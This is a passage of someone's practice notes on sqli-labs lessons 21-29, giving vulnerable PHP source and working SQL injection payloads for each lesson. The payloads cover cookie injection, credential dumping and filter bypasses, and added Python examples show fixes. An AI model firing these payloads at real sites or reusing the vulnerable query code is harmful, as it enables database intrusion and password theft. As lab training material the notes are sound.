SQLI-LAB Practice Notes (Less 21 - Less 30)
What follows is only the record I wrote while working through the sqli-lab exercises, for reference only. Since I had already studied some SQL injection, most of the content comes without explanation; if anything is unclear, please look it up with a search engine and you should find what you need.
Less - 21: Cookie Injection - Error Based - Complex - String
Test:
http://localhost/sqli-lab/Less-21/index.php
uname=Dumb&passwd=Dumb&submit=Submit
YOUR COOKIE : uname = RHVtYg== and expires: Sat 16 Jul 2016 - 08:32:26
Note: RHVtYg== is Dumb after Base64 encoding (a value ending in one or two = characters is worth trying as Base64; any online Base64 encoder/decoder will do).
RHVtYlw=
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''Dumb\') LIMIT 0,1' at line 1
Note: RHVtYlw= is the value of uname in the cookie; the plaintext is Dumb\ , so we can conclude that uname is wrapped in one layer of single quotes and one layer of parentheses.
Source Code:
Login part, when no cookie is present:
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1){
setcookie('uname', base64_encode($row1['username']), time()+3600);
print_r(mysql_error());
echo '<img src="../images/flag.jpg" />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg" />';
}
Login part, when the cookie is present:
$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$cookee = base64_decode($cookee);
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
$result=mysql_query($sql);
if (!$result) {
die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
echo 'Your ID:' .$row['id'];
} else{
echo '<img src="../images/slap1.jpg" />';
}
Solution:
') or 1=1 #
Jykgb3IgMT0xICM=
Others:
JykgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSw2IG9yIDE9MSAj
plaintext: ') union select 1,database(),6 or 1=1 #
JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknICM=
plaintext: ') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lKSxncm91cF9jb25jYXQocGFzc3dvcmQpIGZyb20gc2VjdXJpdHkudXNlcnMgICM=
plaintext: ') union select 1,group_concat(username),group_concat(password) from security.users #
Note: all of the above are values of uname in the cookie.
Less - 22: Cookie Injection - Error Based - Double Quotes - String
Test:
http://localhost/sqli-lab/Less-22/index.php
uname=Dumb&passwd=Dumb&submit=Submit
RHVtYlw=
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"Dumb\" LIMIT 0,1' at line 1
Note: RHVtYlw= is the value of uname in the cookie; the plaintext is Dumb\ , so we can conclude that uname is wrapped in one layer of double quotes.
Source Code:
When logging in without a cookie:
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1) {
setcookie('uname', base64_encode($row1['username']), time()+3600);
print_r(mysql_error());
echo '<img src="../images/flag.jpg" />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg" />';
}
When logging in with a cookie:
$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
$result=mysql_query($sql);
if (!$result) {
die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
echo 'Your ID:' .$row['id'];
} else{
echo '<img src="../images/slap1.jpg" />';
}
Solution:
IiBvciAxPTEgIw==
plaintext: " or 1=1 #
Others:
IiB1bmlvbiBzZWxlY3QgMSxkYXRhYmFzZSgpLDYgb3IgMT0xICM=
plaintext: " union select 1,database(),6 or 1=1 #
IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgIw==
plaintext: " union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodXNlcm5hbWUpLGdyb3VwX2NvbmNhdChwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyAgIw==
plaintext: " union select 1,group_concat(username),group_concat(password) from security.users #
Note: all of the above are values of uname in the cookie.
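Less 21 and 22 both decode a client-supplied cookie and look the user up by it, so the Base64 layer hides nothing and the cookie is attacker-controlled input. The Python below is an added example (not the lab's code and not part of the original notes): it decodes the two cookie values recorded above, then shows the usual fix for the identity half of the problem, an HMAC tag bound to the cookie so that a rewritten payload fails verification. The tag format (base64 payload, a dot, a hex SHA-256 HMAC), the key, and the function names are assumptions of this example.

```python
import base64
import hashlib
import hmac

# The two cookie values recorded in the notes above (taken from the page).
COOKIE_DUMB = "RHVtYg=="            # base64("Dumb")
COOKIE_DUMB_BACKSLASH = "RHVtYlw="  # base64("Dumb\\")


def decode_cookie(value: str) -> str:
    """Base64 is an encoding, not a secret: any client can decode and re-encode it."""
    return base64.b64decode(value).decode("latin-1")


def issue_cookie(username: str, key: bytes) -> str:
    """Server side: tag the encoded name with HMAC-SHA256 under a server-only key.
    Format assumed for this example: <base64 name>.<hex tag>."""
    payload = base64.b64encode(username.encode("utf-8")).decode("ascii")
    tag = hmac.new(key, payload.encode("ascii"), hashlib.sha256).hexdigest()
    return payload + "." + tag


def verify_cookie(cookie: str, key: bytes):
    """Return the username only when the tag matches the payload; None otherwise.
    An untagged legacy-style cookie such as RHVtYg== is rejected as well."""
    payload, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    try:
        expected = hmac.new(key, payload.encode("ascii"), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, tag):
            return None
        return base64.b64decode(payload, validate=True).decode("utf-8")
    except (ValueError, TypeError):   # non-ASCII junk, bad Base64, bad UTF-8
        return None


if __name__ == "__main__":
    key = b"server-only-key (constructed for this example)"
    print(decode_cookie(COOKIE_DUMB), decode_cookie(COOKIE_DUMB_BACKSLASH))
    cookie = issue_cookie("Dumb", key)
    print(cookie, "->", verify_cookie(cookie, key))
    # Swap the payload for another name but keep the tag: verification fails.
    forged = COOKIE_DUMB_BACKSLASH + "." + cookie.split(".")[1]
    print(forged, "->", verify_cookie(forged, key))
```

Integrity of the cookie fixes only who the server believes it is talking to; the verified name must still reach the database as a bound parameter rather than being concatenated into username=('$cookee'), because a legitimately registered name may itself contain a quote.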
Less - 23: Error Based - No Comments
Test:
http://localhost/sqli-lab/Less-23/index.php?id=2'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2'' LIMIT 0,1' at line 1
Note: from this we can infer that $id is wrapped in single quotes.
Source Code:
//filter the comment markers out so that SQL comments do not work
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}else{
print_r(mysql_error());
}
Solution:
' or '1' = '
http://localhost/sqli-lab/Less-23/index.php?id=' or '1' = '
Others:
http://localhost/sqli-lab/Less-23/index.php?id=' union select 1,version(),3 or '1' = '
http://localhost/sqli-lab/Less-23/index.php?id=' union select 1,group_concat(username),group_concat(password) from users where 1 or '1' = '
Less - 24: Second Degree Injections (second-order injection)
Test:
http://localhost/sqli-lab/Less-24/index.php
username=wolf password=1111
Note: sqli-lab was released fairly early and used an early PHP version (probably 5.2); some of the functions it uses have since been removed, so they had to be replaced with equivalents.
Source Code:
login_create.php
$link = mysqli_connect('localhost', 'root', '', 'security');
$username= mysqli_real_escape_string($link,$_POST['username']) ;
$pass= mysqli_real_escape_string($link,$_POST['password']);
$re_pass= mysqli_real_escape_string($link,$_POST['re_password']);
$sql = "insert into users (username, password) values(\"$username\", \"$pass\")";
login.php
$link = mysqli_connect('localhost', 'root', '', 'security');
$username = mysqli_real_escape_string($link,$_POST["login_user"]);
$password = mysqli_real_escape_string($link,$_POST["login_password"]);
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
Solution:
username=admin" # password=1111
Reset the password: change 1111 to anything (e.g. 666)
Then username=admin password=666 logs in.
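The point of Less 24 is that mysqli_real_escape_string only protects the one statement it is applied to: the value stored in the table is the raw name, and when a later statement (here the password change) concatenates that stored name, the quote inside it is live again. The following is an added Python example, not the lab's code: it reproduces the flow against an in-memory SQLite database and puts the parameterized version beside it. Assumptions of this example: the shape of the password-change UPDATE (the notes do not show it), quote-doubling as the stand-in for MySQL's backslash escaping, and the constructed username admin'-- , which uses the -- comment marker because SQLite has no # comments; all function names are this example's own.

```python
import sqlite3


def escape_like_mysqli(text: str) -> str:
    """Stand-in for mysqli_real_escape_string: makes the value safe inside ONE quoted
    literal of ONE statement. SQLite doubles the quote where MySQL would backslash it."""
    return text.replace("'", "''")


def fresh_db() -> sqlite3.Connection:
    """Constructed fixture: one pre-existing admin account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'admin-original-pw')")
    return db


def register_concat(db, username: str, password: str) -> None:
    """login_create.php style: escaped at this boundary, so the INSERT itself is safe,
    but the row now holds the raw name, quote included."""
    db.execute("INSERT INTO users (username, password) VALUES ('%s', '%s')"
               % (escape_like_mysqli(username), escape_like_mysqli(password)))


def change_password_concat(db, session_username: str, old_pw: str, new_pw: str) -> None:
    """Assumed shape of the lab's password-change query: the username comes from the
    session, i.e. straight from the stored row, and is concatenated without escaping.
    That is the second-order injection point."""
    db.execute("UPDATE users SET password='%s' WHERE username='%s' AND password='%s'"
               % (new_pw, session_username, old_pw))


def change_password_param(db, session_username: str, old_pw: str, new_pw: str) -> None:
    """The fix: bind every value, stored or not, in every statement."""
    db.execute("UPDATE users SET password=? WHERE username=? AND password=?",
               (new_pw, session_username, old_pw))


def password_of(db, username: str):
    row = db.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()
    return row[0] if row else None


def run_flow(use_params: bool) -> str:
    """Register a name carrying a quote, then change that account's OWN password.
    Returns admin's password afterwards; a safe flow leaves it unchanged."""
    db = fresh_db()
    name = "admin'-- "   # constructed; the notes use admin" # against MySQL
    register_concat(db, name, "1111")
    stored = db.execute("SELECT username FROM users WHERE username=?", (name,)).fetchone()[0]
    assert stored == name            # escaping did not change what was stored
    if use_params:
        change_password_param(db, stored, "1111", "666")
    else:
        change_password_concat(db, stored, "1111", "666")
    return password_of(db, "admin")


if __name__ == "__main__":
    print("concatenated UPDATE, admin password now:", run_flow(use_params=False))
    print("parameterized UPDATE, admin password now:", run_flow(use_params=True))
```

With concatenation the stored quote terminates the literal and the comment marker discards the password check, so the UPDATE lands on admin; with bound parameters the same stored value only ever matches the attacker's own row.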
Less - 25: Trick with OR & AND
Test:
http://localhost/sqli-lab/Less-25/index.php?id=1' #
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
Note: id is wrapped in single quotes.
http://localhost/sqli-lab/Less-25/index.php?id=1' --+
Note: no error.
Source Code:
function blacklist($id){
$id= preg_replace('/or/i',"", $id);
$id= preg_replace('/AND/i',"", $id);
return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
} else{
print_r(mysql_error());
}
Note: and and or are filtered, errors are shown, and $id is wrapped in single quotes.
Solution:
http://localhost/sqli-lab/Less-25/index.php?id=0' oorr 1=1 --+
http://localhost/sqli-lab/Less-25/index.php?id=2' aandnd 1=1 --+
Others:
http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,version(),database()--+
http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security' --+
http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,group_concat(username),group_concat(passwoorrd) from security.users --+
Note: and and or are filtered, but only in a single pass, so nesting the keyword inside itself is enough.
Less - 25a: Trick with OR & AND - Blind
Test:
http://localhost/sqli-lab/Less-25a/index.php?id=1
http://localhost/sqli-lab/Less-25a/index.php?id=2'
http://localhost/sqli-lab/Less-25a/index.php?id=2"
http://localhost/sqli-lab/Less-25a/index.php?id=2 oorr 1=1 #
Note: there are no quotes around id; or and and are filtered.
Source Code:
function blacklist($id){
$id= preg_replace('/or/i',"", $id);
$id= preg_replace('/AND/i',"", $id);
return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
} else{
}
Note: and and or are filtered; no errors are shown.
Solution:
http://localhost/sqli-lab/Less-25a/index.php?id=0 oorr 1=1 --+
http://localhost/sqli-lab/Less-25a/index.php?id=2 aandnd 1=1 --+
Others:
http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,version(),database() --+
http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security' --+
http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,group_concat(username),group_concat(passwoorrd) from security.users --+
Less - 26: Trick with Comments
Test:
http://localhost/sqli-lab/Less-26/index.php?id=0'")And AND and or OR select union /// #--/*+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '")selectunion' LIMIT 0,1' at line 1
Note: id is wrapped in single quotes only; after filtering, only ")selectunion is left.
Source Code:
function blacklist($id) {
$id= preg_replace('/or/i',"", $id); //strip out "or" (case-insensitive, a single pass)
$id= preg_replace('/and/i',"", $id); //strip out "and" (case-insensitive, a single pass)
$id= preg_replace('/[\/\*]/',"", $id); //strip out every / and * character
$id= preg_replace('/[--]/',"", $id); //strip out every - character (the class [--] contains only -)
$id= preg_replace('/[#]/',"", $id); //strip out #
$id= preg_replace('/[\s]/',"", $id); //strip out ASCII whitespace (\s does not match the 0xA0 byte)
$id= preg_replace('/[\/\\\\]/',"", $id); //strip out / and \
return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}else{
print_r(mysql_error());
}
Note: $id is wrapped in single quotes; or, and, /*, --, #, spaces and / are filtered.
Solution:
http://localhost/sqli-lab/Less-26/index.php?id=1'%26%26'1
Others:
http://localhost/sqli-lab/Less-26/index.php?id=0'%A0UNION%A0SELECT%A01,version(),database()%26%26%a0'1
http://localhost/sqli-lab/Less-26/index.php?id=0'%A0union%A0select%A01,group_concat(table_name),3%A0from%A0infoorrmation_schema.tables%A0where%A0table_schema='security'%26%26%a0'1
http://localhost/sqli-lab/Less-26/index.php?id=0'%A0union%A0select%A01,group_concat(username),group_concat(passwoorrd)%A0from%A0security%2Eusers%A0where%A01%A0%26%26%a0'1
Note: %A0 is used in place of the space, and && (%26%26) in place of AND.
Less - 26a: Trick with Comments
Test:
http://localhost/sqli-lab/Less-26a/index.php?id=1')")And AND and or OR select union /// #--/*+
Note: after filtering only ')")selectunion is left; no SQL error is shown.
http://localhost/sqli-lab/Less-26a/index.php?id=1'%A0%26%26%A0 '1'='1
http://localhost/sqli-lab/Less-26a/index.php?id=1"%A0%26%26%A0 "1"="1
http://localhost/sqli-lab/Less-26a/index.php?id=1")%A0%26%26%A0 ("1")=("1
Note: none of these errors, so the format cannot be told apart.
http://localhost/sqli-lab/Less-26a/index.php?id=0'%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0'1
Note: PHP errors are shown here; the format is probably wrong, so the query finds nothing.
http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0('1
Note: this one is right.
Source Code:
function blacklist($id){
$id= preg_replace('/or/i',"", $id); //strip out "or" (case-insensitive, a single pass)
$id= preg_replace('/and/i',"", $id); //strip out "and" (case-insensitive, a single pass)
$id= preg_replace('/[\/\*]/',"", $id); //strip out every / and * character
$id= preg_replace('/[--]/',"", $id); //strip out every - character (the class [--] contains only -)
$id= preg_replace('/[#]/',"", $id); //strip out #
$id= preg_replace('/[\s]/',"", $id); //strip out ASCII whitespace (\s does not match the 0xA0 byte)
$id= preg_replace('/[\s]/',"", $id); //strip out whitespace (duplicated line, as in the lab source)
$id= preg_replace('/[\/\\\\]/',"", $id); //strip out / and \
return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
} else{
}
Note: $id is wrapped in single quotes and parentheses; or, and, /*, --, #, spaces and / are filtered.
Solution:
http://localhost/sqli-lab/Less-26a/index.php?id=1')%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0('1
Others:
http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0UNION%A0SELECT%A01,version(),database()%26%26%a0('1
http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0union%A0select%A01,group_concat(table_name),3%A0from%A0infoorrmation_schema.tables%A0where%A0table_schema='security'%26%26%a0('1
http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0union%A0select%A01,group_concat(username),group_concat(passwoorrd)%A0from%A0security%2Eusers%A0where%A01%A0%26%26%a0('1
Less - 27: Trick with SELECT & UNION
Test:
http://localhost/sqli-lab/Less-27/index.php?id=0'")And AND and or OR Or or Select SELECT select UNION union Union Union /// #--?/*+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '")AndANDandorOROror' LIMIT 0,1' at line 1
Note: id is wrapped in single quotes; union, select and the characters that act as comments are filtered.
Source Code:
function blacklist($id){
$id= preg_replace('/[\/\*]/',"", $id); //strip out every / and * character
$id= preg_replace('/[--]/',"", $id); //strip out every - character (the class [--] contains only -)
$id= preg_replace('/[#]/',"", $id); //strip out #
$id= preg_replace('/[ +]/',"", $id); //strip out ASCII spaces and + (the 0xA0 byte survives)
$id= preg_replace('/select/m',"", $id); //strip out lowercase select (case-sensitive)
$id= preg_replace('/[ +]/',"", $id); //strip out spaces again
$id= preg_replace('/union/s',"", $id); //strip out union
$id= preg_replace('/select/s',"", $id); //strip out select
$id= preg_replace('/UNION/s',"", $id); //strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //strip out SELECT
$id= preg_replace('/Union/s',"", $id); //strip out Union
$id= preg_replace('/Select/s',"", $id); //strip out Select (mixed case such as SeLeCt is not covered)
return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
} else{
print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-27/index.php?id=0'%A0or(1)=(1)%26%26%a0'1
Others:
http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0'1
http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0'1
http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0'1
Less - 27a: Trick with SELECT & UNION
Test:
http://localhost/sqli-lab/Less-27a/index.php?id=0'")And AND and or OR Or or Select SELECT select UNION union Union Union /// #--?/*+
Note: no SQL error; after filtering, 0'")AndANDandorOROror is left.
Source Code:
function blacklist($id){
$id= preg_replace('/[\/\*]/',"", $id); //strip out every / and * character
$id= preg_replace('/[--]/',"", $id); //strip out every - character (the class [--] contains only -)
$id= preg_replace('/[#]/',"", $id); //strip out #
$id= preg_replace('/[ +]/',"", $id); //strip out ASCII spaces and + (the 0xA0 byte survives)
$id= preg_replace('/select/m',"", $id); //strip out lowercase select (case-sensitive)
$id= preg_replace('/[ +]/',"", $id); //strip out spaces again
$id= preg_replace('/union/s',"", $id); //strip out union
$id= preg_replace('/select/s',"", $id); //strip out select
$id= preg_replace('/UNION/s',"", $id); //strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //strip out SELECT
$id= preg_replace('/Union/s',"", $id); //strip out Union
$id= preg_replace('/Select/s',"", $id); //strip out Select (mixed case such as SeLeCt is not covered)
return $id;
}
$id= blacklist($id);
$hint=$id;
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
} else{
}
Solution:
http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0or(1)=(1)%26%26%a0"1
Others:
http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0"1
http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0"1
http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0"1
Less - 28: Trick with SELECT & UNION
Test:
http://localhost/sqli-lab/Less-28/index.php?id=0'")And AND and or OR Or or UNION union Union Select SELECT select /// #--?/*+
Note: the combination union<space>select and all spaces are filtered; no SQL error is shown.
http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect
Note: in UnIon%A0SeLect the separator is no longer a space, so it is not filtered.
http://localhost/sqli-lab/Less-28/index.php?id=0'%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0'
Note: PHP error.
http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0('
Note: this one is right, so id is wrapped in single quotes and parentheses.
Source Code:
function blacklist($id){
$id= preg_replace('/[\/\*]/',"", $id); //strip out every / and * character
$id= preg_replace('/[--]/',"", $id); //strip out every - character (the class [--] contains only -)
$id= preg_replace('/[#]/',"", $id); //strip out #
$id= preg_replace('/[ +]/',"", $id); //strip out ASCII spaces and + (the 0xA0 byte survives)
$id= preg_replace('/[ +]/',"", $id); //strip out spaces again
$id= preg_replace('/union\s+select/i',"", $id); //strip out union<whitespace>select, case-insensitive; \s does not match 0xA0, and plain spaces were already removed above
return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}else{
}
Solution:
http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0('
Others:
http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0('1
http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0('1
http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0('1
Less - 28a: Trick with SELECT & UNION
Test:
http://localhost/sqli-lab/Less-28a/index.php?id=0'")And AND and or OR Or or UNION union Union Select SELECT select /// #--?/*+
Note: the combination union<space>select is filtered; no SQL error is shown.
http://localhost/sqli-lab/Less-28a/index.php?id=1') --
Note: displays normally; spaces and the characters that act as comments are not filtered.
Source Code:
function blacklist($id){
$id= preg_replace('/union\s+select/i',"", $id);
return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
} else{
}
Solution:
http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,2,3--+
Others:
http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,version(),database()--+
http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,group_concat(username),group_concat(password) from security.users where 1--+
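Less 25, 27 and 28 all rely on deleting keywords or characters from the input, and the notes above record why each filter is incomplete: a single pass over "or" turns oorr into or, the Less 27 list covers only six fixed spellings of select and union, and neither [ +] nor \s matches the 0xA0 byte. The Python below is an added example (not the lab's code): it mirrors those three filters on raw bytes so the gaps can be checked directly, and sets an allow-list parser beside them, which is the fix for an integer id: accept a short decimal number or reject the request, never "clean" it. The function names and the 9-digit cap are choices made here.

```python
import re


def blacklist_less25(value: bytes) -> bytes:
    """Mirror of the Less-25/25a filter: one pass each over 'or' and 'and', case-insensitive."""
    value = re.sub(rb"or", b"", value, flags=re.I)
    value = re.sub(rb"and", b"", value, flags=re.I)
    return value


def blacklist_less27(value: bytes) -> bytes:
    """Mirror of the Less-27/27a filter, in the lab's order. The lab's [--] and [#]
    classes each match a single character, so a plain replace() is equivalent."""
    value = re.sub(rb"[/*]", b"", value)
    value = value.replace(b"-", b"").replace(b"#", b"")
    value = re.sub(rb"[ +]", b"", value)           # ASCII space and '+' only
    for word in (b"select", b"union", b"select", b"UNION", b"SELECT", b"Union", b"Select"):
        value = value.replace(word, b"")           # case-sensitive, fixed spellings
    return value


def blacklist_less28(value: bytes) -> bytes:
    """Mirror of the Less-28 filter: spaces are removed before the combined pattern runs,
    and the whitespace class matches ASCII whitespace only, never the 0xA0 byte."""
    value = re.sub(rb"[/*]", b"", value)
    value = value.replace(b"-", b"").replace(b"#", b"")
    value = re.sub(rb"[ +]", b"", value)
    value = re.sub(rb"union\s+select", b"", value, flags=re.I)
    return value


# Allow-list for an integer id. 9 digits is a cap chosen for this example.
# \Z rather than $, so a trailing newline cannot slip past the check.
ID_PATTERN = re.compile(rb"\A[0-9]{1,9}\Z")


def parse_id(raw: bytes):
    """Return the id as an int, or None to reject the request outright."""
    if ID_PATTERN.match(raw) is None:
        return None
    return int(raw)


if __name__ == "__main__":
    # Constructed inputs, taken from the shapes recorded in the notes above.
    print(blacklist_less25(b"oorr"), blacklist_less25(b"aandnd"))
    print(blacklist_less27(b"0'\xa0UnIoN\xa0SeLeCt(1),2,3"))
    print(blacklist_less28(b"0')\xa0UnIon\xa0SeLect(1),2,3"))
    print(parse_id(b"2"), parse_id(b"2\n"), parse_id(b"0'\xa0or(1)=(1)"))
```

The contrast to notice is that every blacklist above returns some string and lets the request continue, whereas parse_id has exactly two outcomes; the integer it returns can then be bound as a query parameter, and there is nothing left for the filter to miss.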
Less - 29: Protection with WAF
Test:
http://localhost/sqli-lab/Less-29/login.php?id=0' union select 1,2,3 --+
Note: it is detected as malicious and redirected to another page.
Source Code:
login.php
//WAF implementation with a whitelist approach: only allows numeric input.
function whitelist($input) {
$match = preg_match("/^\d+$/", $input);
if($match) {
}else {
header('Location: hacked.php');
}
}
// The function below imitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string) {
$q_s = $query_string;
$qs_array= explode("&",$q_s);
foreach($qs_array as $key => $value) {
$val=substr($value,0,2);
if($val=="id") {
$id_value=substr($value,3,30);
return $id_value; // returns the FIRST id-like member; the two lines below are never reached
echo "<br>";
break;
}
}
}
$qs = $_SERVER['QUERY_STRING'];
$hint=$qs;
$id1=java_implimentation($qs);
$id=$_GET['id'];
whitelist($id1);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
} else{
